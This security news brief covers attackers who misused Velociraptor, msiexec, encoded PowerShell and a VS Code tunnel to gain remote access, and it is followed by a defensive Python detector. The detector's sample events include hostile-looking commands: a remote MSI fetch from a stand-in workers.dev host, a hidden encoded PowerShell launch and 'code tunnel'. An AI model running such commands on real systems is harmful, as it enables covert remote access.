Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling
Briefly

"Further analysis of the incident has revealed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which serves as a staging ground for other tools used by them, including a Cloudflare tunneling tool and a remote administration utility known as Radmin."
"The access is then leveraged to download Visual Studio Code from the same staging server using an encoded PowerShell command and execute the source code editor with the tunnel option enabled in order to allow both remote access and remote code execution. The threat actors have also been observed utilizing the msiexec Windows utility again to download additional payloads from the workers[.]dev folder."
Unknown threat actors deployed the open-source endpoint monitoring and forensic tool Velociraptor to gain access and minimize custom malware use. The attackers used Windows msiexec to fetch an MSI installer hosted on Cloudflare Workers, which served as a staging ground for a Cloudflare tunneling tool and the Radmin remote administration utility. Velociraptor was installed and contacted a separate Cloudflare Workers domain. The adversaries used an encoded PowerShell command to download Visual Studio Code and executed it with the tunnel option enabled to provide remote access and remote code execution. Additional payloads were retrieved from the workers[.]dev folder. Organizations should monitor for unauthorized Velociraptor use and implement endpoint detection and response as a precaution against ransomware.
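The brief recommends monitoring for unauthorized Velociraptor use. The detection sketch below is an added example, not code from the article, The Hacker News, or the Velociraptor project: it scores process-creation events (Sysmon Event ID 1 or Windows 4688 style) for the observables the summary names, namely msiexec fetching an installer from a remote URL, an encoded PowerShell command, Visual Studio Code started with the tunnel option, a workers[.]dev staging domain, and a Velociraptor client starting. The sample events, host names, rule names and the staging hostname are constructed for the example; `-EncodedCommand` and its short forms and the `code tunnel` subcommand are real PowerShell and VS Code CLI syntax. Because Velociraptor is a legitimate tool, the `velociraptor_client` rule is suppressed on hosts the IR team has itself deployed it to, and a host is only escalated when several independent observables land on it.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record; fields mirror Sysmon EID 1 / 4688."""
    host: str
    parent: str
    image: str
    cmdline: str


# Constructed sample events for this example; not taken from the incident.
# Host WS01 shows the full chain, WS02 shows benign look-alikes,
# IR01 is a host where the IR team legitimately runs Velociraptor.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "cmd.exe", "C:\\Windows\\System32\\msiexec.exe",
                 "msiexec.exe /i https://staging-example.workers.dev/setup.msi /qn"),
    ProcessEvent("WS01", "cmd.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA..."),
    ProcessEvent("WS01", "powershell.exe", "C:\\Program Files\\Microsoft VS Code\\code.exe",
                 "code.exe tunnel --accept-server-license-terms"),
    ProcessEvent("WS01", "services.exe", "C:\\Program Files\\Velociraptor\\Velociraptor.exe",
                 "Velociraptor.exe --config client.config.yaml client"),
    ProcessEvent("WS02", "explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
                 "msiexec.exe /i C:\\Users\\alice\\Downloads\\vendor.msi"),
    ProcessEvent("WS02", "cmd.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ProcessEvent("WS02", "explorer.exe", "C:\\Program Files\\Microsoft VS Code\\code.exe",
                 "code.exe C:\\src\\project"),
    ProcessEvent("IR01", "services.exe", "C:\\Program Files\\Velociraptor\\Velociraptor.exe",
                 "Velociraptor.exe --config client.config.yaml client"),
]


def _basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# One rule per observable from the brief: (rule name, predicate over an event).
RULES = [
    # msiexec installing straight from a URL rather than a local file
    ("msiexec_remote_url",
     lambda e: _basename(e.image) == "msiexec.exe"
     and bool(re.search(r"https?://", e.cmdline, re.I))),
    # PowerShell -EncodedCommand and its accepted prefixes -e / -ec / -enc
    ("powershell_encoded",
     lambda e: _basename(e.image) in ("powershell.exe", "pwsh.exe")
     and bool(re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", e.cmdline, re.I))),
    # Visual Studio Code started with the tunnel subcommand
    ("vscode_tunnel",
     lambda e: _basename(e.image) in ("code.exe", "code")
     and bool(re.search(r"(?:^|\s)tunnel(?:\s|$)", e.cmdline, re.I))),
    # any process referencing a workers.dev domain on its command line
    ("workers_dev_url",
     lambda e: bool(re.search(r"\bworkers\.dev\b", e.cmdline, re.I))),
    # a Velociraptor client process starting (benign where IR deployed it)
    ("velociraptor_client",
     lambda e: _basename(e.image) == "velociraptor.exe"),
]


def classify(event: ProcessEvent) -> list[str]:
    """Names of every rule the event matches, in RULES order."""
    return [name for name, pred in RULES if pred(event)]


def triage(events, min_rules: int = 2,
           authorized_velociraptor_hosts=frozenset()) -> dict[str, list[str]]:
    """Map host -> sorted rule names, keeping only hosts with at least
    min_rules distinct observables. Velociraptor starts on hosts in
    authorized_velociraptor_hosts are ignored as known-good."""
    hits: dict[str, set[str]] = defaultdict(set)
    for e in events:
        for name in classify(e):
            if name == "velociraptor_client" and e.host in authorized_velociraptor_hosts:
                continue
            hits[e.host].add(name)
    return {h: sorted(n) for h, n in hits.items() if len(n) >= min_rules}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS, authorized_velociraptor_hosts={"IR01"}).items():
        print(f"{host}: {', '.join(rules)}")
```

Each rule on its own is noisy (software deployment tools also call msiexec with URLs, and developers do use `code tunnel`); the per-host aggregation is what turns the brief's description into an alert worth paging on, and the authorized-host set is where the IR team's own Velociraptor deployment is recorded so the tool's legitimate use does not trip the rule.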
Read at The Hacker News